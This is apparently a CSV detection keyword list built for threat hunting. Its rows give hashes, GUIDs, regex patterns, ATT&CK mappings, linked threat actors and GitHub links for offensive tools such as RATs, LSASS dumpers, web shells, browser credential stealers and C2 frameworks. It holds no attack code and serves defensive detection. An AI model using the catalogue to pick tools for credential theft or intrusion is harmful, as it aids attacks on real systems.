"*b4f113933c223da5cfbb72f5a4ff0c3b1bf54c0d25e56045dea7621ea1021d38*",".{0,1000}b4f113933c223da5cfbb72f5a4ff0c3b1bf54c0d25e56045dea7621ea1021d38.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34740"
"*b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0*",".{0,1000}b4fb64cc1619a9c41a8493ddc6496d3825cbacfa02eb445e4c6371a46a5b84f0.{0,1000}","offensive_tool_keyword","smbsr","Lookup for interesting stuff in SMB shares","T1135","TA0001 - TA0007","N/A","N/A","Discovery","https://github.com/oldboy21/SMBSR","1","0","#filehash","N/A","7","2","149","23","2023-06-16T14:35:30Z","2021-11-10T16:55:52Z","34742"
"*b4fe69c527b9455500142ea58f2a16af2eb9fdfcc7d63079ccf9cb463025ee97*",".{0,1000}b4fe69c527b9455500142ea58f2a16af2eb9fdfcc7d63079ccf9cb463025ee97.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34744"
"*b4ff3bf45fd871b6b6ca158a8890254db5be51ca6aaae3b1559a761caefc80be*",".{0,1000}b4ff3bf45fd871b6b6ca158a8890254db5be51ca6aaae3b1559a761caefc80be.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34745"
"*b4rtik/ATPMiniDump*",".{0,1000}b4rtik\/ATPMiniDump.{0,1000}","offensive_tool_keyword","ATPMiniDump","Dumping LSASS memory with MiniDumpWriteDump on PssCaptureSnapShot to evade WinDefender ATP credential-theft. Take a look at this blog post for details. ATPMiniDump was created starting from Outflank-Dumpert then big credits to @Cneelis","T1003 - T1005 - T1055 - T1218","TA0006 - TA0008 - TA0011","N/A","N/A","Credential Access","https://github.com/b4rtik/ATPMiniDump","1","1","N/A","N/A","N/A","3","255","46","2019-12-02T15:01:22Z","2019-11-29T19:49:54Z","34747"
"*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1055 - T1057 - T1059.001 - T1106 - T1003 - T1071 - T1036 - T1027","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34748"
"*b4rtik/RedPeanut*",".{0,1000}b4rtik\/RedPeanut.{0,1000}","offensive_tool_keyword","RedPeanut","RedPeanut is a small RAT developed in .Net Core 2 and its agent in .Net 3.5 / 4.0.","T1095 - T1071.004","TA0002 - TA0003 - TA0004 - TA0011","N/A","N/A","C2","https://github.com/b4rtik/RedPeanut","1","1","N/A","N/A","10","10","328","81","2023-07-07T21:33:22Z","2019-08-22T07:49:50Z","34749"
"*b4rtik/SharpMiniDump*",".{0,1000}b4rtik\/SharpMiniDump.{0,1000}","offensive_tool_keyword","SharpMiniDump","Create a minidump of the LSASS process from memory","T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/b4rtik/SharpMiniDump","1","1","N/A","N/A","10","3","260","49","2022-11-02T15:47:30Z","2019-09-15T13:45:42Z","34750"
"*b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a*",".{0,1000}b501b1a7f5d1ca09fa28d4c2d9e839a5d7e8a9f336d3698c947cac13b02a599a.{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a  C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","#filehash","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","34751"
"*b504d1a33068b6bde4059071fd7c89d8f9535185f6aad0d1e1361259f66fb529*",".{0,1000}b504d1a33068b6bde4059071fd7c89d8f9535185f6aad0d1e1361259f66fb529.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","34753"
"*b5072f210606f0fcf08e88c188e92ed4df8a35b1811008262401b664268f1f6f*",".{0,1000}b5072f210606f0fcf08e88c188e92ed4df8a35b1811008262401b664268f1f6f.{0,1000}","offensive_tool_keyword","traitor","Automatically exploit low-hanging fruit to pop a root shell. Linux privilege escalation made easy","T1068 - T1548.004 - T1611 - T1203 - T1059.004","TA0004 - TA0001 - TA0002 - TA0005","N/A","N/A","Privilege Escalation","https://github.com/liamg/traitor","1","0","#linux #filehash","N/A","10","10","6853","651","2024-03-12T21:01:14Z","2021-01-24T10:50:15Z","34754"
"*b50db46d79c02f7ceca2ee8dfd3a9767b897089a3777632c061e1f79662892b1*",".{0,1000}b50db46d79c02f7ceca2ee8dfd3a9767b897089a3777632c061e1f79662892b1.{0,1000}","offensive_tool_keyword","WinPwnage","various exploitation tools for windows ","T1548.002 - T1546.016 - T1546.003 - T1547.001 - T1053.005 - T1053.003 - T1548 - T1055.011 - T1078","TA0004 - TA0005 - TA0009 - TA0003 - TA0011","N/A","N/A","Exploitation tool","https://github.com/rootm0s/WinPwnage","1","0","#filehash","N/A","10","10","2670","385","2023-02-13T09:43:13Z","2018-04-08T18:51:50Z","34756"
"*b50fdc8caa85dadb573564b7ab742bb7dfdf0062b3f639adf677d698ec0c81c2*",".{0,1000}b50fdc8caa85dadb573564b7ab742bb7dfdf0062b3f639adf677d698ec0c81c2.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34757"
"*b5122cb03f986f687d1baae60cf8fb683ea112dfddb6589f9713f964edbabef0*",".{0,1000}b5122cb03f986f687d1baae60cf8fb683ea112dfddb6589f9713f964edbabef0.{0,1000}","offensive_tool_keyword","dnspot","End-to-end Encrypted DNS Tunnelling and C2 framework","T1071.004 - T1090.002 - T1573.002","TA0011 - TA0010 - TA0005","N/A","N/A","C2","https://github.com/mosajjal/dnspot","1","0","#filehash","N/A","10","10","73","16","2025-02-01T08:13:29Z","2021-09-25T08:49:43Z","34758"
"*B5205EBA-EC32-4C53-86A0-FAEEE7393EC0*",".{0,1000}B5205EBA\-EC32\-4C53\-86A0\-FAEEE7393EC0.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","34759"
"*b52197072372512053ebf764300a93a6e7957a257cd6524a1458bbafc4dcb33f*",".{0,1000}b52197072372512053ebf764300a93a6e7957a257cd6524a1458bbafc4dcb33f.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34760"
"*b52b7a516a2db79a0f025b4163e6c90468fd7b176114adf6277af4677879de8c*",".{0,1000}b52b7a516a2db79a0f025b4163e6c90468fd7b176114adf6277af4677879de8c.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34762"
"*b52bf0de684c3d760b7422000c16116af30392da82723239f25a2007e03ee9e4*",".{0,1000}b52bf0de684c3d760b7422000c16116af30392da82723239f25a2007e03ee9e4.{0,1000}","offensive_tool_keyword","Lime-RAT","remote administration tool for Windows (RAT)","T1059 - T1573.001 - T1027 - T1091 - T1486 - T1036 - T1560 - T1566 - T1480 - T1498 - T1113 - T1083 - T1016 - T1105 - T1056 - T1021 - T1112 - T1082 - T1072 - T1076 - T1078 - T1209 - T1003 - T1012 - T1100 - T1135 - T1108 - T1029 - T1547 - T1053 - T1060 - T1102 - T1124 - T1049 - T1123 - T1145 - T1210 - T1046 - T1010 - T1055","TA0040 - TA0010 - TA0005 - TA0011 - TA0043 - TA0006 - TA0042 - TA0008 - TA0009 - TA0007 - TA0002 - TA0003","N/A","APT-C-36 - Operation Comando","Malware","https://github.com/NYAN-x-CAT/Lime-RAT","1","0","#filehash","N/A","10","10","1086","413","2019-06-24T17:05:48Z","2018-02-07T15:35:56Z","34763"
"*B52E2D10-A94A-4605-914A-2DCEF6A757EF*",".{0,1000}B52E2D10\-A94A\-4605\-914A\-2DCEF6A757EF.{0,1000}","offensive_tool_keyword","shutter","The goal of Shutter is to manage windows network stack communication via Windows Filtering Platform. Management can include blocking or permiting traffic based on IP or an executable that initiates or receives the traffic.","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/dsnezhkov/shutter","1","0","#GUIDproject","N/A","10","2","116","15","2021-05-12T19:05:14Z","2021-05-12T18:51:03Z","34764"
"*b5309c785e75feec7be157b0965444e2b2b0d4c592769f20589a3218f32151c0*",".{0,1000}b5309c785e75feec7be157b0965444e2b2b0d4c592769f20589a3218f32151c0.{0,1000}","offensive_tool_keyword","Group3r","Find vulnerabilities in AD Group Policy","T1484.002 - T1069.002 - T1087.002","TA0007 - TA0040","N/A","KNOTWEED","Discovery","https://github.com/Group3r/Group3r","1","0","#filehash","AD Enumeration","7","8","781","68","2025-04-08T05:03:34Z","2021-07-05T05:05:42Z","34765"
"*b5353522d8bc03a2af708da3c93bb2f21d0b3bc9a158018b4613c3b66725aad4*",".{0,1000}b5353522d8bc03a2af708da3c93bb2f21d0b3bc9a158018b4613c3b66725aad4.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34766"
"*b538808beaa60c3bc7ed3a900242e0ddfbd8b66f38b7df9c1e85f9e892b3efec*",".{0,1000}b538808beaa60c3bc7ed3a900242e0ddfbd8b66f38b7df9c1e85f9e892b3efec.{0,1000}","offensive_tool_keyword","Malware RAT collection","from Malware RAT samples","T1105 - T1059 - T1109 - T1016 - T1071.001 - T1082 - T1027 - T1083 - T1056 - T1106 - T1078 - T1053","TA0011 - TA0009 - TA0006 - TA0003 - TA0002 - TA0005 - TA0007","N/A","N/A","Malware","https://github.com/x-cod3r/Remote-administration-tools-archive","1","0","#filehash","N/A","9","1","93","30","2023-10-03T15:08:22Z","2023-10-03T13:09:00Z","34767"
"*b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb*",".{0,1000}b53fab9c9dfd6eabe8c543a8484f216dba733b3831b4c440cef8064407c343fb.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","34769"
"*b540f94a9f462bc217673faf2d247cb4b9b3eb44ae3307890dc6cda3aa3e5bb2*",".{0,1000}b540f94a9f462bc217673faf2d247cb4b9b3eb44ae3307890dc6cda3aa3e5bb2.{0,1000}","offensive_tool_keyword","Eventlogedit-evtx--Evolution","","T1070.001 - T1564.001","TA0005","N/A","N/A","Defense Evasion","https://github.com/3gstudent/Eventlogedit-evtx--Evolution","1","0","#filehash","N/A","9","3","267","62","2021-04-17T01:28:00Z","2018-06-05T01:21:20Z","34770"
"*b54792e5bf55da77fb025772858aee457ee4f679a8363faf35d0397db897b92a*",".{0,1000}b54792e5bf55da77fb025772858aee457ee4f679a8363faf35d0397db897b92a.{0,1000}","offensive_tool_keyword","pth-toolkit","A modified version of the passing-the-hash tool collection https://code.google.com/p/passing-the-hash/ designed to be portable and work straight out of the box even on the most 'bare bones' systems","T1550.002 - T1075 - T1078","TA0006 - TA0008","N/A","APT1","Lateral Movement","https://github.com/byt3bl33d3r/pth-toolkit","1","0","#filehash","N/A","10","6","575","131","2015-02-06T15:10:41Z","2015-02-03T10:31:56Z","34771"
"*b549aa579ebc29e5813a950f8ecd0af5cd17752da9fb2129824ef490b82c31d3*",".{0,1000}b549aa579ebc29e5813a950f8ecd0af5cd17752da9fb2129824ef490b82c31d3.{0,1000}","offensive_tool_keyword","BloodHound","Use Invoke-BloodHound from SharpHound.ps1 or use SharpHound.exe. Both can be run reflectively. Examples below use the PowerShell variant but arguments are identical.","T1482 - T1087 - T1069 - T1018","TA0007 - TA0008 - TA0004","N/A","APT29 - MAZE - LockBit - Conti - XingLocker - Revil - Hive - Black Basta - Wizard Spider - TA2101 - TRAVELING SPIDER - Chimera - TA505 - APT20 - COZY BEAR - EMBER BEAR - Dispossessor","Discovery","https://github.com/BloodHoundAD/BloodHound/tree/master/Collectors","1","0","#filehash","N/A","10","10","10146","1759","2025-04-02T15:56:30Z","2016-04-17T18:36:14Z","34772"
"*b54ab14a7ad0460c7ac6416a9ad01e7015d32573571114b569f4769a2eb12e70*",".{0,1000}b54ab14a7ad0460c7ac6416a9ad01e7015d32573571114b569f4769a2eb12e70.{0,1000}","offensive_tool_keyword","htran","proxies connections through intermediate hops and aids users in disguising their true geographical location. It can be used by adversaries to hide their location when interacting with the victim networks","T1055 - T1090 - T1014","TA0003 - TA0005 - TA0011","N/A","GALLIUM - APT10 - APT12 - Deep Panda - MenuPass","C2","https://github.com/HiwinCN/Htran","1","0","#filehash","N/A","9","10","256","88","2021-04-25T09:57:46Z","2015-12-03T04:54:53Z","34773"
"*b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd*",".{0,1000}b54b60bac7b606297627c36b551aa0dfb1291a73175e98da76014e36839049cd.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","34774"
"*b55327db315e4dee5dd8c93b20b5d503613d64a2e1b181263f4715c6c312bb7c*",".{0,1000}b55327db315e4dee5dd8c93b20b5d503613d64a2e1b181263f4715c6c312bb7c.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","34775"
"*b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd*",".{0,1000}b55dd8b809ebb71681cb09b07d6def2ea453d36d25c2a74a4ecac7662c3ddbbd.{0,1000}","offensive_tool_keyword","arsenal","Arsenal is just a quick inventory and launcher for hacking programs","T1596 - T1587","TA0042 - TA0001","N/A","N/A","Exploitation tool","https://github.com/Orange-Cyberdefense/arsenal","1","0","#filehash","commands cheat sheets","8","10","3399","511","2024-11-29T14:48:20Z","2020-09-02T13:24:50Z","34776"
"*B5627919-4DFB-49C6-AC1B-C757F4B4A103*",".{0,1000}B5627919\-4DFB\-49C6\-AC1B\-C757F4B4A103.{0,1000}","offensive_tool_keyword","ContainYourself","Abuses the Windows containers framework to bypass EDRs.","T1562 - T1562.004 - T1212 - T1212.002 - T1055 - T1055.015","TA0005","N/A","N/A","Defense Evasion","https://github.com/deepinstinct/ContainYourself","1","0","#GUIDproject","N/A","10","4","310","39","2023-08-31T07:26:22Z","2023-07-12T14:47:24Z","34778"
"*b568e1b6cad25bc604735e958975fd0471c60ddec52368f36e204f83e8cbd5e1*",".{0,1000}b568e1b6cad25bc604735e958975fd0471c60ddec52368f36e204f83e8cbd5e1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34780"
"*b56d067b0f6c9368f044d12bc73bd55da36bc766f60409f219cc77100d7f5ba3*",".{0,1000}b56d067b0f6c9368f044d12bc73bd55da36bc766f60409f219cc77100d7f5ba3.{0,1000}","offensive_tool_keyword","ldapnomnom","Anonymously bruteforce Active Directory usernames from Domain Controllers by abusing LDAP Ping requests (cLDAP)","T1110.003 - T1205","TA0007","N/A","N/A","Discovery","https://github.com/lkarlslund/ldapnomnom","1","0","#filehash","N/A","6","10","1030","80","2024-11-09T10:15:13Z","2022-09-18T10:35:09Z","34781"
"*b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d*",".{0,1000}b57bf397984545f419045391b56dcaf7b0bed8b6ee331b5c46cee35c92ffa13d.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34782"
"*b5822ac44575655904ac07d44997d0c552a13786e2962ad6fe4813b8146e679e*",".{0,1000}b5822ac44575655904ac07d44997d0c552a13786e2962ad6fe4813b8146e679e.{0,1000}","offensive_tool_keyword","AutoBlue-MS17-010","automated exploit code for MS17-010","T1210 - T1040 - T1059.001","TA0001 - TA0002 - TA0005","N/A","Dispossessor","Exploitation tool","https://github.com/3ndG4me/AutoBlue-MS17-010","1","0","#filehash","N/A","6","10","1240","317","2023-12-24T19:22:26Z","2017-11-25T09:03:38Z","34785"
"*B58767EE-5185-4E99-818F-6285332400E6*",".{0,1000}B58767EE\-5185\-4E99\-818F\-6285332400E6.{0,1000}","offensive_tool_keyword","specula","Specula is a C2 framework that allows for interactive operations of an implant that runs purely in the context of outlook","T1071.001 - T1105 - T1204 - T1548.002 - T1071 - T1562","TA0011 - TA0002 - TA0003 - TA0006 - TA0008 - TA0007 - TA0009 - TA0010","N/A","N/A","C2","https://github.com/trustedsec/specula","1","0","#GUIDproject","N/A","10","10","191","21","2024-09-23T09:25:33Z","2023-12-07T15:59:52Z","34787"
"*b58a654ad8e0c13d821b1c88a84ce3d9a436a563f8c9c5063b2dae0184b91b22*",".{0,1000}b58a654ad8e0c13d821b1c88a84ce3d9a436a563f8c9c5063b2dae0184b91b22.{0,1000}","offensive_tool_keyword","truffleHog","Searches through git repositories for secrets. digging deep into commit history and branches. This is effective at finding secrets accidentally committed.","T1552 - T1596 - T1083","TA0009 - TA0005 - TA0002","N/A","Scattered Spider*","Reconnaissance","https://github.com/dxa4481/truffleHog","1","0","#filehash #linux","N/A","6","10","18812","1839","2025-04-22T17:32:40Z","2016-12-31T05:08:12Z","34788"
"*b58ac9e4804b66b9a7f7000923454b3b5cabfe991bfb99ae7b6d89fd4b2cab0b*",".{0,1000}b58ac9e4804b66b9a7f7000923454b3b5cabfe991bfb99ae7b6d89fd4b2cab0b.{0,1000}","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1087.001 - T1087.002 - T1482 - T1016 - T1018 - T1046","TA0007 - TA0043 - TA0005 - TA0042","Dispossessor - Trickbot - Dridex - Locky - Uyghur - BlackCat - ALPHV - Defray777 - RansomExx","APT20 - TA505 - APT29 - GOLD DUPONT - Scattered Spider - UNC3944 - TA2101 - Wizard Spider - Grim Spider - Lunar Spider - Dispossessor","Discovery","https://github.com/BloodHoundAD/SharpHound","1","0","#filehash","N/A","N/A","10","904","195","2025-04-18T20:45:04Z","2021-07-12T17:07:04Z","34789"
"*b58d48c4e18ca596bea2b23eb26a6fde046f71fadb6f179ddf6734353e5e00ba*",".{0,1000}b58d48c4e18ca596bea2b23eb26a6fde046f71fadb6f179ddf6734353e5e00ba.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","34790"
"*b58e5bd0a4f4691d791c3fc90885d0c36daf28b4d22a8a04d25f4cd221fb1517*",".{0,1000}b58e5bd0a4f4691d791c3fc90885d0c36daf28b4d22a8a04d25f4cd221fb1517.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34791"
"*B59C7741-D522-4A41-BF4D-9BADDDEBB84A*",".{0,1000}B59C7741\-D522\-4A41\-BF4D\-9BADDDEBB84A.{0,1000}","offensive_tool_keyword","SharpPack","collection of C# tools that include functionalities like Kerberoasting - ticket manipulation - Mimikatz - privilege escalation - domain enumeration and more","T1558.003 - T1003 - T1059.004 - T1078 - T1212 - T1087 - T1016 - T1071 - T1555 - T1203","TA0003 - TA0004 - TA0006 - TA0008 - TA0009 - TA0011","N/A","N/A","Exploitation tool","https://github.com/Lexus89/SharpPack","1","0","#GUIDproject","N/A","10","1","78","19","2019-08-12T13:25:25Z","2018-10-01T12:45:16Z","34793"
"*B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650*",".{0,1000}B5A3FA5B3DA95F6AA7556EE2BC62E5D290F72453105EF88E170174994DDA2650.{0,1000}","offensive_tool_keyword","ADACLScanner","A tool with GUI used to create reports of access control lists (DACLs) and system access control lists (SACLs) in Active Directory .","T1222 - T1069 - T1018","TA0002 - TA0007 - TA0043","N/A","N/A","Discovery","https://github.com/canix1/ADACLScanner","1","0","#filehash","AD Enumeration","7","10","1015","173","2025-04-11T14:35:08Z","2017-04-06T12:28:37Z","34795"
"*b5abbe48ab64e19472e5540d92810c40a2f79484d96d5da9e7e8d5581a01afe1*",".{0,1000}b5abbe48ab64e19472e5540d92810c40a2f79484d96d5da9e7e8d5581a01afe1.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","34797"
"*b5ad23ea9d77b64653171f466d8f325936a00bcc8917f6064c66ec146db8a3ba*",".{0,1000}b5ad23ea9d77b64653171f466d8f325936a00bcc8917f6064c66ec146db8a3ba.{0,1000}","offensive_tool_keyword","MakeMeAdmin","Enables users to elevate themselves to administrator-level rights","T1078 - T1059 - T1087","TA0004","N/A","N/A","Privilege Escalation","https://github.com/pseymour/MakeMeAdmin","1","0","#filehash","N/A","9","5","430","94","2024-12-22T02:56:23Z","2018-05-29T19:42:58Z","34798"
"*b5b0c796fe213a7f4a840d46a10ad4d36eb26521c19e026ae5f46b17f390b77a*",".{0,1000}b5b0c796fe213a7f4a840d46a10ad4d36eb26521c19e026ae5f46b17f390b77a.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","34799"
"*b5b45d5d5dce3e17d8fe1f7a8e14f0746ae1277023967dca344c61f34e4b442e*",".{0,1000}b5b45d5d5dce3e17d8fe1f7a8e14f0746ae1277023967dca344c61f34e4b442e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","34800"
"*b5bc556355336910d01dadab5af53e9726b1722a247bc6124ee4a3e4431ec8de*",".{0,1000}b5bc556355336910d01dadab5af53e9726b1722a247bc6124ee4a3e4431ec8de.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash #linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","34801"
"*b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e*",".{0,1000}b5c59b19f4a9301c29b40a6565a3c21dc71fd3baf14a755c67ca735b3d18cb9e.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","34803"
"*B5C5BDD1-568E-44F6-91FF-B26962AF9A6C*",".{0,1000}B5C5BDD1\-568E\-44F6\-91FF\-B26962AF9A6C.{0,1000}","offensive_tool_keyword","DcRat","DcRat C2 A simple remote tool in C#","T1071 - T1021 - T1003","TA0011","N/A","N/A","Malware","https://github.com/qwqdanchun/DcRat","1","0","#GUIDproject","N/A","10","10","968","332","2022-02-07T05:37:09Z","2021-03-12T11:00:37Z","34804"
"*b5cbcd477e65b4fad4c55e22043eda8859bab60bbdaad28386cf5a70f04299cd*",".{0,1000}b5cbcd477e65b4fad4c55e22043eda8859bab60bbdaad28386cf5a70f04299cd.{0,1000}","offensive_tool_keyword","Powershell-Scripts-for-Hackers-and-Pentesters","","T1059.001 - T1119 - T1027 - T1016 - T1056.001","TA0002 - TA0009 - TA0005 - TA0007 - TA0010","N/A","N/A","Collection","https://github.com/Whitecat18/Powershell-Scripts-for-Hackers-and-Pentesters","1","0","#filehash","N/A","10","5","415","49","2025-02-23T09:05:44Z","2023-02-27T14:27:32Z","34805"
